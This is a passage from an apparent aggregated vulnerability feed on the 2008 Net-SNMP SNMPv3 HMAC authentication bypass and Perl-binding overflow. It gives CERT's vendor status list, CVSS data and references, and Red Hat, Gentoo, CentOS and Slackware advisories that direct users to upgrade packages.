<http://www.cisco.com/warp/public/707/cisco-sa-20080610-snmpv3.shtml> for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23878044 Feedback>).\n\n### Clavister Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cosinecom Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Covalent Technologies Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cyclades, Inc. Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### D-Link Systems, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Data Connection, Ltd. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Debian GNU/Linux Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### EMC Corporation Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Enterasys Networks Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ericsson Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Gentoo Linux Unknown\n\nNotified: June 04, 2008 Updated: June 04, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Harris Corporation Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hyperchip Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IP Filter Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IP Infusion, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ingrian Networks, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Inktomi Corporation (now Yahoo!) Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Intoto Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lantronix Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Linux Kernel Archives Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lotus Software Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lucent Technologies Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Luminous Networks Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Mandriva, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Marconi, Inc. Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### McAfee Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MetaSwitch Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Metrobility, Inc. Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Motion Media Technologies, Inc. Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Multinet (owned Process Software Corporation) Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Multitech, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Net-Policy Unknown\n\nUpdated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Netgear, Inc. Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Netscape Communications Corporation Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NextHop Technologies, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nortel Networks, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Oracle Corporation Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Polycom Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QUALCOMM Incorporated Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quagga Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Rad Vision, Inc. Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Redback Networks, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Riverstone Networks, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SUSE Linux Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Secure Computing Network Security Division Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Secureworx, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SmoothWall Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Snort Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Soapstone Networks Unknown\n\nNotified: June 02, 2008 Updated: June 02, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sourcefire Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Symantec, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### The Teamware Group Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Trustix Secure Linux Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vertical Networks, Inc. Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Watchguard Technologies, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ZyXEL Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### cPanel Inc. Unknown\n\nNotified: June 13, 2008 Updated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### eSoft, Inc. Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### m0n0wall Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### netfilter Unknown\n\nNotified: May 20, 2008 Updated: May 20, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### netsnmpj Unknown\n\nUpdated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### openSNMP Unknown\n\nUpdated: June 13, 2008 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 128 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 0 | AV:--/AC:--/Au:--/C:--/I:--/A:-- \nTemporal | 0 | E:ND/RL:ND/RC:ND \nEnvironmental | 0 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://sourceforge.net/forum/forum.php?forum_id=833770>\n * <http://www.ocert.org/advisories/ocert-2008-006.html>\n * <http://secunia.com/advisories/30574/>\n * <http://secunia.com/advisories/30665/>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-66-238865-1>\n\n### Acknowledgements\n\nThis issue was reported by Wes Hardaker at Net-SNMP. Thanks also to Jeff Case of SNMP Research and oCERT.\n\nThis document was written by Chris Taschner and David Warren.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2008-0960](<http://web.nvd.nist.gov/vuln/detail/CVE-2008-0960>) \n---|--- \n**Severity Metric:** | 7.56 \n**Date Public:** | 2008-05-31 \n**Date First Published:** | 2008-06-10 \n**Date Last Updated: ** | 2009-07-16 18:00 UTC \n**Document Revision: ** | 37 \n", "modified": "2009-07-16T18:00:00", "published": "2008-06-10T00:00:00", "id": "VU:878044", "href": "https://www.kb.cert.org/vuls/id/878044", "type": "cert", "title": "SNMPv3 improper HMAC validation allows authentication bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:36", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0960", "CVE-2008-2292"], "description": "The Simple Network Management Protocol (SNMP) is a protocol used for\r\nnetwork management.\r\n\r\nA flaw was found in the way Net-SNMP checked an SNMPv3 packet's Keyed-Hash\r\nMessage Authentication Code (HMAC). An attacker could use this flaw to\r\nspoof an authenticated SNMPv3 packet. (CVE-2008-0960)\r\n\r\nA buffer overflow was found in the Perl bindings for Net-SNMP. This could\r\nbe exploited if an attacker could convince an application using the\r\nNet-SNMP Perl module to connect to a malicious SNMP agent. (CVE-2008-2292)\r\n\r\nAll users of net-snmp should upgrade to these updated packages, which\r\ncontain backported patches to resolve these issues.", "modified": "2017-09-08T12:06:30", "published": "2008-06-10T04:00:00", "id": "RHSA-2008:0529", "href": "https://access.redhat.com/errata/RHSA-2008:0529", "type": "redhat", "title": "(RHSA-2008:0529) Moderate: net-snmp security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:37", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "edition": 1, "description": "### Background\n\nNet-SNMP is a collection of tools for generating and retrieving SNMP data. The SNMPv3 protocol uses a keyed-Hash Message Authentication Code (HMAC) to verify data integrity and authenticity of SNMP messages. \n\n### Description\n\nWes Hardaker reported that the SNMPv3 HMAC verification relies on the client to specify the HMAC length (CVE-2008-0960). John Kortink reported a buffer overflow in the Perl bindings of Net-SNMP when processing the OCTETSTRING in an attribute value pair (AVP) received by an SNMP agent (CVE-2008-2292). \n\n### Impact\n\nAn attacker could send SNMPv3 packets to an instance of snmpd providing a valid user name and an HMAC length value of 1, and easily conduct brute-force attacks to bypass SNMP authentication. An attacker could further entice a user to connect to a malicious SNMP agent with an SNMP client using the Perl bindings, possibly resulting in the execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Net-SNMP users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/net-snmp-5.4.1.1\"", "modified": "2008-08-06T00:00:00", "published": "2008-08-06T00:00:00", "id": "GLSA-200808-02", "href": "https://security.gentoo.org/glsa/200808-02", "type": "gentoo", "title": "Net-SNMP: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2019-12-20T18:26:28", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0529\n\n\nThe Simple Network Management Protocol (SNMP) is a protocol used for\r\nnetwork management.\r\n\r\nA flaw was found in the way Net-SNMP checked an SNMPv3 packet's Keyed-Hash\r\nMessage Authentication Code (HMAC). An attacker could use this flaw to\r\nspoof an authenticated SNMPv3 packet. (CVE-2008-0960)\r\n\r\nA buffer overflow was found in the Perl bindings for Net-SNMP. This could\r\nbe exploited if an attacker could convince an application using the\r\nNet-SNMP Perl module to connect to a malicious SNMP agent. (CVE-2008-2292)\r\n\r\nAll users of net-snmp should upgrade to these updated packages, which\r\ncontain backported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027008.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027009.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027018.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027021.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027024.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027027.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027052.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027053.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027078.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-June/027079.html\n\n**Affected packages:**\nnet-snmp\nnet-snmp-devel\nnet-snmp-libs\nnet-snmp-perl\nnet-snmp-utils\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0529.html", "edition": 4, "modified": "2008-06-27T09:57:43", "published": "2008-06-10T20:39:52", "href": "http://lists.centos.org/pipermail/centos-announce/2008-June/027008.html", "id": "CESA-2008:0529", "title": "net security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:35:59", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0960", "CVE-2008-2292"], "description": "New net-snmp packages are available for Slackware 12.0, 12.1, and -current to\nfix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2292\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/net-snmp-5.4.1.2-i486-1_slack12.1.tgz:\n Upgraded to net-snmp-5.4.1.2.\n A vulnerability was discovered where an attacked could spoof an authenticated\n SNMPv3 packet due to incorrect HMAC checking. Also, a buffer overflow was\n found that could be exploited if an application using the net-snmp perl\n modules connects to a malicious server.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2292\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 